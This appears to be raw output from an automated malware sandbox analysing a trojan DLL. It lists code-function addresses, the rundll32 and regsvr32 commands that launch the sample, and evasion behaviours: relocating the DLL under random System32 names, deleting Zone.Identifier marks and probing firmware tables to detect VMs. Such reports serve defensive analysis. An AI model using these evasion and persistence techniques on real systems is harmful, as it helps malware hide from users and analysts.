                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800185984_2_0000000180018598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800035984_2_0000000180003598
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002A9A84_2_000000018002A9A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800119A84_2_00000001800119A8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180025DAC4_2_0000000180025DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180018DAC4_2_0000000180018DAC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800269B04_2_00000001800269B0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800059B84_2_00000001800059B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800029BC4_2_00000001800029BC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800141C04_2_00000001800141C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800125C44_2_00000001800125C4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800121CC4_2_00000001800121CC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800075D44_2_00000001800075D4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800095DC4_2_00000001800095DC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F9E84_2_000000018000F9E8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800026104_2_0000000180002610
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800196184_2_0000000180019618
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180013E284_2_0000000180013E28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001FA384_2_000000018001FA38
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A2704_2_000000018000A270
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019E784_2_0000000180019E78
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DA804_2_000000018001DA80
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800246984_2_0000000180024698
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000EE984_2_000000018000EE98
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800176B84_2_00000001800176B8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AAB84_2_000000018001AAB8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180011AD04_2_0000000180011AD0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180008AD84_2_0000000180008AD8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800296EC4_2_00000001800296EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000A6EC4_2_000000018000A6EC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800132F04_2_00000001800132F0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800193004_2_0000000180019300
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BB044_2_000000018001BB04
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002870C4_2_000000018002870C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180026B104_2_0000000180026B10
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000131C4_2_000000018000131C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000671C4_2_000000018000671C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180029B284_2_0000000180029B28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180012F284_2_0000000180012F28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000BB284_2_000000018000BB28
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001EB304_2_000000018001EB30
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800203344_2_0000000180020334
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800107584_2_0000000180010758
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001435C4_2_000000018001435C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180009F5C4_2_0000000180009F5C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800293684_2_0000000180029368
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800207684_2_0000000180020768
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800173784_2_0000000180017378
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800137804_2_0000000180013780
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800153884_2_0000000180015388
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000338C4_2_000000018000338C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000738C4_2_000000018000738C
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800027904_2_0000000180002790
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800197A04_2_00000001800197A0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018002C7B44_2_000000018002C7B4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001DFB44_2_000000018001DFB4
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001F7C04_2_000000018001F7C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800097C04_2_00000001800097C0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800157D84_2_00000001800157D8
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180019FDC4_2_0000000180019FDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180017BDC4_2_0000000180017BDC
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018000F7E04_2_000000018000F7E0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180001FE04_2_0000000180001FE0
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000001A5A5E900004_2_000001A5A5E90000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00EE00006_2_00EE0000
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180010FF46_2_0000000180010FF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180028C206_2_0000000180028C20
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C0586_2_000000018002C058
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ACA46_2_000000018001ACA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000551C6_2_000000018000551C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800181486_2_0000000180018148
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000E1E06_2_000000018000E1E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C6086_2_000000018000C608
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800216186_2_0000000180021618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180013E286_2_0000000180013E28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002AE446_2_000000018002AE44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D26C6_2_000000018000D26C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800252786_2_0000000180025278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000EE986_2_000000018000EE98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A86_2_00000001800046A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001AAB86_2_000000018001AAB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004ACA6_2_0000000180004ACA
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800132F06_2_00000001800132F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180026B106_2_0000000180026B10
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DBE86_2_000000018001DBE8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FC0C6_2_000000018001FC0C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000580C6_2_000000018000580C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800220106_2_0000000180022010
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001481C6_2_000000018001481C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A42C6_2_000000018002A42C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800118346_2_0000000180011834
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180021C3C6_2_0000000180021C3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000703C6_2_000000018000703C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000AC486_2_000000018000AC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000FC486_2_000000018000FC48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800244586_2_0000000180024458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800064586_2_0000000180006458
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C05C6_2_000000018001C05C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001A4606_2_000000018001A460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800298886_2_0000000180029888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D49C6_2_000000018001D49C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008CA06_2_0000000180008CA0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800248A86_2_00000001800248A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180015CB06_2_0000000180015CB0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800124B46_2_00000001800124B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000C4B46_2_000000018000C4B4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800288B86_2_00000001800288B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800024B86_2_00000001800024B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000D8C46_2_000000018000D8C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800250CC6_2_00000001800250CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800190D46_2_00000001800190D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180017CE46_2_0000000180017CE4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800264F06_2_00000001800264F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800014F86_2_00000001800014F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180020CFC6_2_0000000180020CFC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800091006_2_0000000180009100
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002C9046_2_000000018002C904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800179086_2_0000000180017908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800215106_2_0000000180021510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9176_2_000000018000F917
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F1286_2_000000018000F128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001CD386_2_000000018001CD38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180016D3C6_2_0000000180016D3C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F9446_2_000000018001F944
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001D9506_2_000000018001D950
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800131506_2_0000000180013150
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001ED506_2_000000018001ED50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001E9606_2_000000018001E960
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019D606_2_0000000180019D60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C9646_2_000000018001C964
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001C5686_2_000000018001C568
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180001D686_2_0000000180001D68
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001496C6_2_000000018001496C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180002D706_2_0000000180002D70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800245746_2_0000000180024574
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800021786_2_0000000180002178
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180024D806_2_0000000180024D80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800185986_2_0000000180018598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800035986_2_0000000180003598
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001F1A46_2_000000018001F1A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002A9A86_2_000000018002A9A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800119A86_2_00000001800119A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180025DAC6_2_0000000180025DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180018DAC6_2_0000000180018DAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800269B06_2_00000001800269B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800059B86_2_00000001800059B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800029BC6_2_00000001800029BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800141C06_2_00000001800141C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800125C46_2_00000001800125C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800121CC6_2_00000001800121CC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BDD06_2_000000018000BDD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800075D46_2_00000001800075D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800095DC6_2_00000001800095DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000F9E86_2_000000018000F9E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800026106_2_0000000180002610
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800196186_2_0000000180019618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001FA386_2_000000018001FA38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A2706_2_000000018000A270
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180019E786_2_0000000180019E78
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001DA806_2_000000018001DA80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800246986_2_0000000180024698
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800176B86_2_00000001800176B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002CAD06_2_000000018002CAD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180011AD06_2_0000000180011AD0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180008AD86_2_0000000180008AD8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800296EC6_2_00000001800296EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000A6EC6_2_000000018000A6EC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800193006_2_0000000180019300
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001BB046_2_000000018001BB04
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018002870C6_2_000000018002870C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000131C6_2_000000018000131C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000671C6_2_000000018000671C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180029B286_2_0000000180029B28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180012F286_2_0000000180012F28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BB286_2_000000018000BB28
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001EB306_2_000000018001EB30
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800203346_2_0000000180020334
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800107586_2_0000000180010758
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018001435C6_2_000000018001435C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180009F5C6_2_0000000180009F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800293686_2_0000000180029368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800207686_2_0000000180020768
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800173786_2_0000000180017378
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: C:\Windows\System32\svchost.exeSection loaded: windowscoredeviceinfo.dllJump to behavior
                      Source: x4ByCNJqst.dllVirustotal: Detection: 38%
                      Source: x4ByCNJqst.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                      Source: C:\Windows\System32\loaddll64.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\x4ByCNJqst.dll"
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServer
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServer
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k wusvcs -p -s WaaSMedicSvc
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1Jump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dllJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllRegisterServerJump to behavior
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\x4ByCNJqst.dll,DllUnregisterServerJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{D105A4D4-344C-48EB-9866-EE378D90658B}\InProcServer32Jump to behavior
                      Source: classification engineClassification label: mal80.troj.evad.winDLL@19/0@0/1
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800046A8 CreateToolhelp32Snapshot,Process32FirstW,FindCloseChangeNotification,6_2_00000001800046A8
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\x4ByCNJqst.dll",#1
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: x4ByCNJqst.dllStatic PE information: Image base 0x180000000 > 0x60000000
                      Source: x4ByCNJqst.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: msacm32.pdb source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: msacm32.pdbGCTL source: regsvr32.exe, 00000006.00000002.743348166.0000000000C74000.00000004.00000010.00020000.00000000.sdmp
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AFFD push ebp; retf 2_2_000000018001AFFE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800051D1 push ebp; iretd 2_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BA32 push ebp; retf 2_2_000000018001BA33
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_0000000180004E83 push es; ret 2_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B694 push es; ret 2_2_000000018001B6E9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001BADD push ebp; iretd 2_2_000000018001BADE
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001B717 push ebp; iretd 2_2_000000018001B718
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_000000018001AF4E push ebp; retf 2_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00000001800253BC pushfd ; retn 0057h2_2_00000001800253BD
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AFFD push ebp; retf 3_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_00000001800051D1 push ebp; iretd 3_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BA32 push ebp; retf 3_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180004E83 push es; ret 3_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B694 push es; ret 3_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001BADD push ebp; iretd 3_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001B717 push ebp; iretd 3_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_0000000180007B3F push esp; retf 3_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 3_2_000000018001AF4E push ebp; retf 3_2_000000018001AF4F
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AFFD push ebp; retf 4_2_000000018001AFFE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_00000001800051D1 push ebp; iretd 4_2_00000001800051D2
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BA32 push ebp; retf 4_2_000000018001BA33
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180004E83 push es; ret 4_2_0000000180004E84
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B694 push es; ret 4_2_000000018001B6E9
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001BADD push ebp; iretd 4_2_000000018001BADE
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001B717 push ebp; iretd 4_2_000000018001B718
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_0000000180007B3F push esp; retf 4_2_0000000180007B40
                      Source: C:\Windows\System32\rundll32.exeCode function: 4_2_000000018001AF4E push ebp; retf 4_2_000000018001AF4F
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_00000001800051D1 push ebp; iretd 6_2_00000001800051D2
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180004E83 push es; ret 6_2_0000000180004E84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_0000000180007B3F push esp; retf 6_2_0000000180007B40
                      Source: C:\Windows\System32\regsvr32.exeCode function: 2_2_00007FF8CA9B7BE8 DecodePointer,_errno,LoadLibraryA,GetProcAddress,_errno,GetLastError,GetLastError,EncodePointer,FreeLibrary,_errno,_errno,2_2_00007FF8CA9B7BE8
                      Source: x4ByCNJqst.dllStatic PE information: real checksum: 0x85ab6 should be: 0x8b992
                      Source: C:\Windows\System32\loaddll64.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\x4ByCNJqst.dll
                      Source: C:\Windows\System32\regsvr32.exePE file moved: C:\Windows\System32\ZqFjKrAb\CiXiSWjn.dllJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\ZqFjKrAb\CiXiSWjn.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\BjWTKnjEmZvEAxR\DAQSugqx.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\rundll32.exeFile opened: C:\Windows\system32\TQIlAvLfSGzEP\udKChXzXiH.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Query firmware table information (likely to detect VMs)
                      Source: C:\Windows\System32\svchost.exeSystem information queried: FirmwareTableInformationJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 2192Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 4864Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_2-10063
                      Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
